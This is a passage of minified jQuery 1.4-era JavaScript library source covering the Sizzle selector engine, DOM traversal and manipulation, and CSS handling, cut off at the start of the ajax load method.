function(a,b){c.fn[b]=function(d){return d?this.bind(b,d):this.trigger(b)};if(c.attrFn)c.attrFn[b]=true});A.attachEvent&&!A.addEventListener&&A.attachEvent("onunload",function(){for(var a in c.cache)if(c.cache[a].handle)try{c.event.remove(c.cache[a].handle.elem)}catch(b){}});(function(){function a(g){for(var h="",l,m=0;g[m];m++){l=g[m];if(l.nodeType===3||l.nodeType===4)h+=l.nodeValue;else if(l.nodeType!==8)h+=a(l.childNodes)}return h}function b(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];
if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1&&!p){t.sizcache=l;t.sizset=q}if(t.nodeName.toLowerCase()===h){y=t;break}t=t[g]}m[q]=y}}}function d(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1){if(!p){t.sizcache=l;t.sizset=q}if(typeof h!=="string"){if(t===h){y=true;break}}else if(k.filter(h,[t]).length>0){y=t;break}}t=t[g]}m[q]=y}}}var f=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,
e=0,j=Object.prototype.toString,i=false,o=true;[0,0].sort(function(){o=false;return 0});var k=function(g,h,l,m){l=l||[];var q=h=h||s;if(h.nodeType!==1&&h.nodeType!==9)return[];if(!g||typeof g!=="string")return l;for(var p=[],v,t,y,S,H=true,M=x(h),I=g;(f.exec(""),v=f.exec(I))!==null;){I=v[3];p.push(v[1]);if(v[2]){S=v[3];break}}if(p.length>1&&r.exec(g))if(p.length===2&&n.relative[p[0]])t=ga(p[0]+p[1],h);else for(t=n.relative[p[0]]?[h]:k(p.shift(),h);p.length;){g=p.shift();if(n.relative[g])g+=p.shift();
t=ga(g,t)}else{if(!m&&p.length>1&&h.nodeType===9&&!M&&n.match.ID.test(p[0])&&!n.match.ID.test(p[p.length-1])){v=k.find(p.shift(),h,M);h=v.expr?k.filter(v.expr,v.set)[0]:v.set[0]}if(h){v=m?{expr:p.pop(),set:z(m)}:k.find(p.pop(),p.length===1&&(p[0]==="~"||p[0]==="+")&&h.parentNode?h.parentNode:h,M);t=v.expr?k.filter(v.expr,v.set):v.set;if(p.length>0)y=z(t);else H=false;for(;p.length;){var D=p.pop();v=D;if(n.relative[D])v=p.pop();else D="";if(v==null)v=h;n.relative[D](y,v,M)}}else y=[]}y||(y=t);y||k.error(D||
g);if(j.call(y)==="[object Array]")if(H)if(h&&h.nodeType===1)for(g=0;y[g]!=null;g++){if(y[g]&&(y[g]===true||y[g].nodeType===1&&E(h,y[g])))l.push(t[g])}else for(g=0;y[g]!=null;g++)y[g]&&y[g].nodeType===1&&l.push(t[g]);else l.push.apply(l,y);else z(y,l);if(S){k(S,q,l,m);k.uniqueSort(l)}return l};k.uniqueSort=function(g){if(B){i=o;g.sort(B);if(i)for(var h=1;h<g.length;h++)g[h]===g[h-1]&&g.splice(h--,1)}return g};k.matches=function(g,h){return k(g,null,null,h)};k.find=function(g,h,l){var m,q;if(!g)return[];
for(var p=0,v=n.order.length;p<v;p++){var t=n.order[p];if(q=n.leftMatch[t].exec(g)){var y=q[1];q.splice(1,1);if(y.substr(y.length-1)!=="\\"){q[1]=(q[1]||"").replace(/\\/g,"");m=n.find[t](q,h,l);if(m!=null){g=g.replace(n.match[t],"");break}}}}m||(m=h.getElementsByTagName("*"));return{set:m,expr:g}};k.filter=function(g,h,l,m){for(var q=g,p=[],v=h,t,y,S=h&&h[0]&&x(h[0]);g&&h.length;){for(var H in n.filter)if((t=n.leftMatch[H].exec(g))!=null&&t[2]){var M=n.filter[H],I,D;D=t[1];y=false;t.splice(1,1);if(D.substr(D.length-
1)!=="\\"){if(v===p)p=[];if(n.preFilter[H])if(t=n.preFilter[H](t,v,l,p,m,S)){if(t===true)continue}else y=I=true;if(t)for(var U=0;(D=v[U])!=null;U++)if(D){I=M(D,t,U,v);var Ha=m^!!I;if(l&&I!=null)if(Ha)y=true;else v[U]=false;else if(Ha){p.push(D);y=true}}if(I!==w){l||(v=p);g=g.replace(n.match[H],"");if(!y)return[];break}}}if(g===q)if(y==null)k.error(g);else break;q=g}return v};k.error=function(g){throw"Syntax error, unrecognized expression: "+g;};var n=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,
CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(g){return g.getAttribute("href")}},
relative:{"+":function(g,h){var l=typeof h==="string",m=l&&!/\W/.test(h);l=l&&!m;if(m)h=h.toLowerCase();m=0;for(var q=g.length,p;m<q;m++)if(p=g[m]){for(;(p=p.previousSibling)&&p.nodeType!==1;);g[m]=l||p&&p.nodeName.toLowerCase()===h?p||false:p===h}l&&k.filter(h,g,true)},">":function(g,h){var l=typeof h==="string";if(l&&!/\W/.test(h)){h=h.toLowerCase();for(var m=0,q=g.length;m<q;m++){var p=g[m];if(p){l=p.parentNode;g[m]=l.nodeName.toLowerCase()===h?l:false}}}else{m=0;for(q=g.length;m<q;m++)if(p=g[m])g[m]=
l?p.parentNode:p.parentNode===h;l&&k.filter(h,g,true)}},"":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("parentNode",h,m,g,p,l)},"~":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("previousSibling",h,m,g,p,l)}},find:{ID:function(g,h,l){if(typeof h.getElementById!=="undefined"&&!l)return(g=h.getElementById(g[1]))?[g]:[]},NAME:function(g,h){if(typeof h.getElementsByName!=="undefined"){var l=[];
h=h.getElementsByName(g[1]);for(var m=0,q=h.length;m<q;m++)h[m].getAttribute("name")===g[1]&&l.push(h[m]);return l.length===0?null:l}},TAG:function(g,h){return h.getElementsByTagName(g[1])}},preFilter:{CLASS:function(g,h,l,m,q,p){g=" "+g[1].replace(/\\/g,"")+" ";if(p)return g;p=0;for(var v;(v=h[p])!=null;p++)if(v)if(q^(v.className&&(" "+v.className+" ").replace(/[\t\n]/g," ").indexOf(g)>=0))l||m.push(v);else if(l)h[p]=false;return false},ID:function(g){return g[1].replace(/\\/g,"")},TAG:function(g){return g[1].toLowerCase()},
CHILD:function(g){if(g[1]==="nth"){var h=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(g[2]==="even"&&"2n"||g[2]==="odd"&&"2n+1"||!/\D/.test(g[2])&&"0n+"+g[2]||g[2]);g[2]=h[1]+(h[2]||1)-0;g[3]=h[3]-0}g[0]=e++;return g},ATTR:function(g,h,l,m,q,p){h=g[1].replace(/\\/g,"");if(!p&&n.attrMap[h])g[1]=n.attrMap[h];if(g[2]==="~=")g[4]=" "+g[4]+" ";return g},PSEUDO:function(g,h,l,m,q){if(g[1]==="not")if((f.exec(g[3])||"").length>1||/^\w/.test(g[3]))g[3]=k(g[3],null,null,h);else{g=k.filter(g[3],h,l,true^q);l||m.push.apply(m,
g);return false}else if(n.match.POS.test(g[0])||n.match.CHILD.test(g[0]))return true;return g},POS:function(g){g.unshift(true);return g}},filters:{enabled:function(g){return g.disabled===false&&g.type!=="hidden"},disabled:function(g){return g.disabled===true},checked:function(g){return g.checked===true},selected:function(g){return g.selected===true},parent:function(g){return!!g.firstChild},empty:function(g){return!g.firstChild},has:function(g,h,l){return!!k(l[3],g).length},header:function(g){return/h\d/i.test(g.nodeName)},
text:function(g){return"text"===g.type},radio:function(g){return"radio"===g.type},checkbox:function(g){return"checkbox"===g.type},file:function(g){return"file"===g.type},password:function(g){return"password"===g.type},submit:function(g){return"submit"===g.type},image:function(g){return"image"===g.type},reset:function(g){return"reset"===g.type},button:function(g){return"button"===g.type||g.nodeName.toLowerCase()==="button"},input:function(g){return/input|select|textarea|button/i.test(g.nodeName)}},
setFilters:{first:function(g,h){return h===0},last:function(g,h,l,m){return h===m.length-1},even:function(g,h){return h%2===0},odd:function(g,h){return h%2===1},lt:function(g,h,l){return h<l[3]-0},gt:function(g,h,l){return h>l[3]-0},nth:function(g,h,l){return l[3]-0===h},eq:function(g,h,l){return l[3]-0===h}},filter:{PSEUDO:function(g,h,l,m){var q=h[1],p=n.filters[q];if(p)return p(g,l,h,m);else if(q==="contains")return(g.textContent||g.innerText||a([g])||"").indexOf(h[3])>=0;else if(q==="not"){h=
h[3];l=0;for(m=h.length;l<m;l++)if(h[l]===g)return false;return true}else k.error("Syntax error, unrecognized expression: "+q)},CHILD:function(g,h){var l=h[1],m=g;switch(l){case "only":case "first":for(;m=m.previousSibling;)if(m.nodeType===1)return false;if(l==="first")return true;m=g;case "last":for(;m=m.nextSibling;)if(m.nodeType===1)return false;return true;case "nth":l=h[2];var q=h[3];if(l===1&&q===0)return true;h=h[0];var p=g.parentNode;if(p&&(p.sizcache!==h||!g.nodeIndex)){var v=0;for(m=p.firstChild;m;m=
m.nextSibling)if(m.nodeType===1)m.nodeIndex=++v;p.sizcache=h}g=g.nodeIndex-q;return l===0?g===0:g%l===0&&g/l>=0}},ID:function(g,h){return g.nodeType===1&&g.getAttribute("id")===h},TAG:function(g,h){return h==="*"&&g.nodeType===1||g.nodeName.toLowerCase()===h},CLASS:function(g,h){return(" "+(g.className||g.getAttribute("class"))+" ").indexOf(h)>-1},ATTR:function(g,h){var l=h[1];g=n.attrHandle[l]?n.attrHandle[l](g):g[l]!=null?g[l]:g.getAttribute(l);l=g+"";var m=h[2];h=h[4];return g==null?m==="!=":m===
"="?l===h:m==="*="?l.indexOf(h)>=0:m==="~="?(" "+l+" ").indexOf(h)>=0:!h?l&&g!==false:m==="!="?l!==h:m==="^="?l.indexOf(h)===0:m==="$="?l.substr(l.length-h.length)===h:m==="|="?l===h||l.substr(0,h.length+1)===h+"-":false},POS:function(g,h,l,m){var q=n.setFilters[h[2]];if(q)return q(g,l,h,m)}}},r=n.match.POS;for(var u in n.match){n.match[u]=new RegExp(n.match[u].source+/(?![^\[]*\])(?![^\(]*\))/.source);n.leftMatch[u]=new RegExp(/(^(?:.|\r|\n)*?)/.source+n.match[u].source.replace(/\\(\d+)/g,function(g,
h){return"\\"+(h-0+1)}))}var z=function(g,h){g=Array.prototype.slice.call(g,0);if(h){h.push.apply(h,g);return h}return g};try{Array.prototype.slice.call(s.documentElement.childNodes,0)}catch(C){z=function(g,h){h=h||[];if(j.call(g)==="[object Array]")Array.prototype.push.apply(h,g);else if(typeof g.length==="number")for(var l=0,m=g.length;l<m;l++)h.push(g[l]);else for(l=0;g[l];l++)h.push(g[l]);return h}}var B;if(s.documentElement.compareDocumentPosition)B=function(g,h){if(!g.compareDocumentPosition||
!h.compareDocumentPosition){if(g==h)i=true;return g.compareDocumentPosition?-1:1}g=g.compareDocumentPosition(h)&4?-1:g===h?0:1;if(g===0)i=true;return g};else if("sourceIndex"in s.documentElement)B=function(g,h){if(!g.sourceIndex||!h.sourceIndex){if(g==h)i=true;return g.sourceIndex?-1:1}g=g.sourceIndex-h.sourceIndex;if(g===0)i=true;return g};else if(s.createRange)B=function(g,h){if(!g.ownerDocument||!h.ownerDocument){if(g==h)i=true;return g.ownerDocument?-1:1}var l=g.ownerDocument.createRange(),m=
h.ownerDocument.createRange();l.setStart(g,0);l.setEnd(g,0);m.setStart(h,0);m.setEnd(h,0);g=l.compareBoundaryPoints(Range.START_TO_END,m);if(g===0)i=true;return g};(function(){var g=s.createElement("div"),h="script"+(new Date).getTime();g.innerHTML="<a name='"+h+"'/>";var l=s.documentElement;l.insertBefore(g,l.firstChild);if(s.getElementById(h)){n.find.ID=function(m,q,p){if(typeof q.getElementById!=="undefined"&&!p)return(q=q.getElementById(m[1]))?q.id===m[1]||typeof q.getAttributeNode!=="undefined"&&
q.getAttributeNode("id").nodeValue===m[1]?[q]:w:[]};n.filter.ID=function(m,q){var p=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&p&&p.nodeValue===q}}l.removeChild(g);l=g=null})();(function(){var g=s.createElement("div");g.appendChild(s.createComment(""));if(g.getElementsByTagName("*").length>0)n.find.TAG=function(h,l){l=l.getElementsByTagName(h[1]);if(h[1]==="*"){h=[];for(var m=0;l[m];m++)l[m].nodeType===1&&h.push(l[m]);l=h}return l};g.innerHTML="<a href='#'></a>";
if(g.firstChild&&typeof g.firstChild.getAttribute!=="undefined"&&g.firstChild.getAttribute("href")!=="#")n.attrHandle.href=function(h){return h.getAttribute("href",2)};g=null})();s.querySelectorAll&&function(){var g=k,h=s.createElement("div");h.innerHTML="<p class='TEST'></p>";if(!(h.querySelectorAll&&h.querySelectorAll(".TEST").length===0)){k=function(m,q,p,v){q=q||s;if(!v&&q.nodeType===9&&!x(q))try{return z(q.querySelectorAll(m),p)}catch(t){}return g(m,q,p,v)};for(var l in g)k[l]=g[l];h=null}}();
(function(){var g=s.createElement("div");g.innerHTML="<div class='test e'></div><div class='test'></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}:
function(g,h){return g!==h&&(g.contains?g.contains(h):true)},x=function(g){return(g=(g?g.ownerDocument||g:0).documentElement)?g.nodeName!=="HTML":false},ga=function(g,h){var l=[],m="",q;for(h=h.nodeType?[h]:h;q=n.match.PSEUDO.exec(g);){m+=q[0];g=g.replace(n.match.PSEUDO,"")}g=n.relative[g]?g+"*":g;q=0;for(var p=h.length;q<p;q++)k(g,h[q],l);return k.filter(m,l)};c.find=k;c.expr=k.selectors;c.expr[":"]=c.expr.filters;c.unique=k.uniqueSort;c.text=a;c.isXMLDoc=x;c.contains=E})();var eb=/Until$/,fb=/^(?:parents|prevUntil|prevAll)/,
gb=/,/;R=Array.prototype.slice;var Ia=function(a,b,d){if(c.isFunction(b))return c.grep(a,function(e,j){return!!b.call(e,j,e)===d});else if(b.nodeType)return c.grep(a,function(e){return e===b===d});else if(typeof b==="string"){var f=c.grep(a,function(e){return e.nodeType===1});if(Ua.test(b))return c.filter(b,f,!d);else b=c.filter(b,f)}return c.grep(a,function(e){return c.inArray(e,b)>=0===d})};c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,f=0,e=this.length;f<e;f++){d=b.length;
c.find(a,this[f],b);if(f>0)for(var j=d;j<b.length;j++)for(var i=0;i<d;i++)if(b[i]===b[j]){b.splice(j--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,f=b.length;d<f;d++)if(c.contains(this,b[d]))return true})},not:function(a){return this.pushStack(Ia(this,a,false),"not",a)},filter:function(a){return this.pushStack(Ia(this,a,true),"filter",a)},is:function(a){return!!a&&c.filter(a,this).length>0},closest:function(a,b){if(c.isArray(a)){var d=[],f=this[0],e,j=
{},i;if(f&&a.length){e=0;for(var o=a.length;e<o;e++){i=a[e];j[i]||(j[i]=c.expr.match.POS.test(i)?c(i,b||this.context):i)}for(;f&&f.ownerDocument&&f!==b;){for(i in j){e=j[i];if(e.jquery?e.index(f)>-1:c(f).is(e)){d.push({selector:i,elem:f});delete j[i]}}f=f.parentNode}}return d}var k=c.expr.match.POS.test(a)?c(a,b||this.context):null;return this.map(function(n,r){for(;r&&r.ownerDocument&&r!==b;){if(k?k.index(r)>-1:c(r).is(a))return r;r=r.parentNode}return null})},index:function(a){if(!a||typeof a===
"string")return c.inArray(this[0],a?c(a):this.parent().children());return c.inArray(a.jquery?a[0]:a,this)},add:function(a,b){a=typeof a==="string"?c(a,b||this.context):c.makeArray(a);b=c.merge(this.get(),a);return this.pushStack(qa(a[0])||qa(b[0])?b:c.unique(b))},andSelf:function(){return this.add(this.prevObject)}});c.each({parent:function(a){return(a=a.parentNode)&&a.nodeType!==11?a:null},parents:function(a){return c.dir(a,"parentNode")},parentsUntil:function(a,b,d){return c.dir(a,"parentNode",
d)},next:function(a){return c.nth(a,2,"nextSibling")},prev:function(a){return c.nth(a,2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?
a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,b){c.fn[a]=function(d,f){var e=c.map(this,b,d);eb.test(a)||(f=d);if(f&&typeof f==="string")e=c.filter(f,e);e=this.length>1?c.unique(e):e;if((this.length>1||gb.test(f))&&fb.test(a))e=e.reverse();return this.pushStack(e,a,R.call(arguments).join(","))}});c.extend({filter:function(a,b,d){if(d)a=":not("+a+")";return c.find.matches(a,b)},dir:function(a,b,d){var f=[];for(a=a[b];a&&a.nodeType!==9&&(d===w||a.nodeType!==1||!c(a).is(d));){a.nodeType===
1&&f.push(a);a=a[b]}return f},nth:function(a,b,d){b=b||1;for(var f=0;a;a=a[d])if(a.nodeType===1&&++f===b)break;return a},sibling:function(a,b){for(var d=[];a;a=a.nextSibling)a.nodeType===1&&a!==b&&d.push(a);return d}});var Ja=/ jQuery\d+="(?:\d+|null)"/g,V=/^\s+/,Ka=/(<([\w:]+)[^>]*?)\/>/g,hb=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,La=/<([\w:]+)/,ib=/<tbody/i,jb=/<|&#?\w+;/,ta=/<script|<object|<embed|<option|<style/i,ua=/checked\s*(?:[^=]|=\s*.checked.)/i,Ma=function(a,b,d){return hb.test(d)?
a:b+"></"+d+">"},F={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};F.optgroup=F.option;F.tbody=F.tfoot=F.colgroup=F.caption=F.thead;F.th=F.td;if(!c.support.htmlSerialize)F._default=[1,"div<div>","</div>"];c.fn.extend({text:function(a){if(c.isFunction(a))return this.each(function(b){var d=
c(this);d.text(a.call(this,b,d.text()))});if(typeof a!=="object"&&a!==w)return this.empty().append((this[0]&&this[0].ownerDocument||s).createTextNode(a));return c.text(this)},wrapAll:function(a){if(c.isFunction(a))return this.each(function(d){c(this).wrapAll(a.call(this,d))});if(this[0]){var b=c(a,this[0].ownerDocument).eq(0).clone(true);this[0].parentNode&&b.insertBefore(this[0]);b.map(function(){for(var d=this;d.firstChild&&d.firstChild.nodeType===1;)d=d.firstChild;return d}).append(this)}return this},
wrapInner:function(a){if(c.isFunction(a))return this.each(function(b){c(this).wrapInner(a.call(this,b))});return this.each(function(){var b=c(this),d=b.contents();d.length?d.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){c(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){c.nodeName(this,"body")||c(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.appendChild(a)})},
prepend:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this)});else if(arguments.length){var a=c(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,
this.nextSibling)});else if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,c(arguments[0]).toArray());return a}},remove:function(a,b){for(var d=0,f;(f=this[d])!=null;d++)if(!a||c.filter(a,[f]).length){if(!b&&f.nodeType===1){c.cleanData(f.getElementsByTagName("*"));c.cleanData([f])}f.parentNode&&f.parentNode.removeChild(f)}return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++)for(b.nodeType===1&&c.cleanData(b.getElementsByTagName("*"));b.firstChild;)b.removeChild(b.firstChild);
return this},clone:function(a){var b=this.map(function(){if(!c.support.noCloneEvent&&!c.isXMLDoc(this)){var d=this.outerHTML,f=this.ownerDocument;if(!d){d=f.createElement("div");d.appendChild(this.cloneNode(true));d=d.innerHTML}return c.clean([d.replace(Ja,"").replace(/=([^="'>\s]+\/)>/g,'="$1">').replace(V,"")],f)[0]}else return this.cloneNode(true)});if(a===true){ra(this,b);ra(this.find("*"),b.find("*"))}return b},html:function(a){if(a===w)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(Ja,
""):null;else if(typeof a==="string"&&!ta.test(a)&&(c.support.leadingWhitespace||!V.test(a))&&!F[(La.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Ka,Ma);try{for(var b=0,d=this.length;b<d;b++)if(this[b].nodeType===1){c.cleanData(this[b].getElementsByTagName("*"));this[b].innerHTML=a}}catch(f){this.empty().append(a)}}else c.isFunction(a)?this.each(function(e){var j=c(this),i=j.html();j.empty().append(function(){return a.call(this,e,i)})}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&
this[0].parentNode){if(c.isFunction(a))return this.each(function(b){var d=c(this),f=d.html();d.replaceWith(a.call(this,b,f))});if(typeof a!=="string")a=c(a).detach();return this.each(function(){var b=this.nextSibling,d=this.parentNode;c(this).remove();b?c(b).before(a):c(d).append(a)})}else return this.pushStack(c(c.isFunction(a)?a():a),"replaceWith",a)},detach:function(a){return this.remove(a,true)},domManip:function(a,b,d){function f(u){return c.nodeName(u,"table")?u.getElementsByTagName("tbody")[0]||
u.appendChild(u.ownerDocument.createElement("tbody")):u}var e,j,i=a[0],o=[],k;if(!c.support.checkClone&&arguments.length===3&&typeof i==="string"&&ua.test(i))return this.each(function(){c(this).domManip(a,b,d,true)});if(c.isFunction(i))return this.each(function(u){var z=c(this);a[0]=i.call(this,u,b?z.html():w);z.domManip(a,b,d)});if(this[0]){e=i&&i.parentNode;e=c.support.parentNode&&e&&e.nodeType===11&&e.childNodes.length===this.length?{fragment:e}:sa(a,this,o);k=e.fragment;if(j=k.childNodes.length===
1?(k=k.firstChild):k.firstChild){b=b&&c.nodeName(j,"tr");for(var n=0,r=this.length;n<r;n++)d.call(b?f(this[n],j):this[n],n>0||e.cacheable||this.length>1?k.cloneNode(true):k)}o.length&&c.each(o,Qa)}return this}});c.fragments={};c.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){c.fn[a]=function(d){var f=[];d=c(d);var e=this.length===1&&this[0].parentNode;if(e&&e.nodeType===11&&e.childNodes.length===1&&d.length===1){d[b](this[0]);
return this}else{e=0;for(var j=d.length;e<j;e++){var i=(e>0?this.clone(true):this).get();c.fn[b].apply(c(d[e]),i);f=f.concat(i)}return this.pushStack(f,a,d.selector)}}});c.extend({clean:function(a,b,d,f){b=b||s;if(typeof b.createElement==="undefined")b=b.ownerDocument||b[0]&&b[0].ownerDocument||s;for(var e=[],j=0,i;(i=a[j])!=null;j++){if(typeof i==="number")i+="";if(i){if(typeof i==="string"&&!jb.test(i))i=b.createTextNode(i);else if(typeof i==="string"){i=i.replace(Ka,Ma);var o=(La.exec(i)||["",
""])[1].toLowerCase(),k=F[o]||F._default,n=k[0],r=b.createElement("div");for(r.innerHTML=k[1]+i+k[2];n--;)r=r.lastChild;if(!c.support.tbody){n=ib.test(i);o=o==="table"&&!n?r.firstChild&&r.firstChild.childNodes:k[1]==="<table>"&&!n?r.childNodes:[];for(k=o.length-1;k>=0;--k)c.nodeName(o[k],"tbody")&&!o[k].childNodes.length&&o[k].parentNode.removeChild(o[k])}!c.support.leadingWhitespace&&V.test(i)&&r.insertBefore(b.createTextNode(V.exec(i)[0]),r.firstChild);i=r.childNodes}if(i.nodeType)e.push(i);else e=
c.merge(e,i)}}if(d)for(j=0;e[j];j++)if(f&&c.nodeName(e[j],"script")&&(!e[j].type||e[j].type.toLowerCase()==="text/javascript"))f.push(e[j].parentNode?e[j].parentNode.removeChild(e[j]):e[j]);else{e[j].nodeType===1&&e.splice.apply(e,[j+1,0].concat(c.makeArray(e[j].getElementsByTagName("script"))));d.appendChild(e[j])}return e},cleanData:function(a){for(var b,d,f=c.cache,e=c.event.special,j=c.support.deleteExpando,i=0,o;(o=a[i])!=null;i++)if(d=o[c.expando]){b=f[d];if(b.events)for(var k in b.events)e[k]?
c.event.remove(o,k):Ca(o,k,b.handle);if(j)delete o[c.expando];else o.removeAttribute&&o.removeAttribute(c.expando);delete f[d]}}});var kb=/z-?index|font-?weight|opacity|zoom|line-?height/i,Na=/alpha\([^)]*\)/,Oa=/opacity=([^)]*)/,ha=/float/i,ia=/-([a-z])/ig,lb=/([A-Z])/g,mb=/^-?\d+(?:px)?$/i,nb=/^-?\d/,ob={position:"absolute",visibility:"hidden",display:"block"},pb=["Left","Right"],qb=["Top","Bottom"],rb=s.defaultView&&s.defaultView.getComputedStyle,Pa=c.support.cssFloat?"cssFloat":"styleFloat",ja=
function(a,b){return b.toUpperCase()};c.fn.css=function(a,b){return X(this,a,b,true,function(d,f,e){if(e===w)return c.curCSS(d,f);if(typeof e==="number"&&!kb.test(f))e+="px";c.style(d,f,e)})};c.extend({style:function(a,b,d){if(!a||a.nodeType===3||a.nodeType===8)return w;if((b==="width"||b==="height")&&parseFloat(d)<0)d=w;var f=a.style||a,e=d!==w;if(!c.support.opacity&&b==="opacity"){if(e){f.zoom=1;b=parseInt(d,10)+""==="NaN"?"":"alpha(opacity="+d*100+")";a=f.filter||c.curCSS(a,"filter")||"";f.filter=
Na.test(a)?a.replace(Na,b):b}return f.filter&&f.filter.indexOf("opacity=")>=0?parseFloat(Oa.exec(f.filter)[1])/100+"":""}if(ha.test(b))b=Pa;b=b.replace(ia,ja);if(e)f[b]=d;return f[b]},css:function(a,b,d,f){if(b==="width"||b==="height"){var e,j=b==="width"?pb:qb;function i(){e=b==="width"?a.offsetWidth:a.offsetHeight;f!=="border"&&c.each(j,function(){f||(e-=parseFloat(c.curCSS(a,"padding"+this,true))||0);if(f==="margin")e+=parseFloat(c.curCSS(a,"margin"+this,true))||0;else e-=parseFloat(c.curCSS(a,
"border"+this+"Width",true))||0})}a.offsetWidth!==0?i():c.swap(a,ob,i);return Math.max(0,Math.round(e))}return c.curCSS(a,b,d)},curCSS:function(a,b,d){var f,e=a.style;if(!c.support.opacity&&b==="opacity"&&a.currentStyle){f=Oa.test(a.currentStyle.filter||"")?parseFloat(RegExp.$1)/100+"":"";return f===""?"1":f}if(ha.test(b))b=Pa;if(!d&&e&&e[b])f=e[b];else if(rb){if(ha.test(b))b="float";b=b.replace(lb,"-$1").toLowerCase();e=a.ownerDocument.defaultView;if(!e)return null;if(a=e.getComputedStyle(a,null))f=
a.getPropertyValue(b);if(b==="opacity"&&f==="")f="1"}else if(a.currentStyle){d=b.replace(ia,ja);f=a.currentStyle[b]||a.currentStyle[d];if(!mb.test(f)&&nb.test(f)){b=e.left;var j=a.runtimeStyle.left;a.runtimeStyle.left=a.currentStyle.left;e.left=d==="fontSize"?"1em":f||0;f=e.pixelLeft+"px";e.left=b;a.runtimeStyle.left=j}}return f},swap:function(a,b,d){var f={};for(var e in b){f[e]=a.style[e];a.style[e]=b[e]}d.call(a);for(e in b)a.style[e]=f[e]}});if(c.expr&&c.expr.filters){c.expr.filters.hidden=function(a){var b=
a.offsetWidth,d=a.offsetHeight,f=a.nodeName.toLowerCase()==="tr";return b===0&&d===0&&!f?true:b>0&&d>0&&!f?false:c.curCSS(a,"display")==="none"};c.expr.filters.visible=function(a){return!c.expr.filters.hidden(a)}}var sb=J(),tb=/<script(.|\s)*?\/script>/gi,ub=/select|textarea/i,vb=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,N=/=\?(&|$)/,ka=/\?/,wb=/(\?|&)_=.*?(&|$)/,xb=/^(\w+:)?\/\/([^\/?#]+)/,yb=/%20/g,zb=c.fn.load;c.fn.extend({load:function(a,b,d){if(typeof a!==
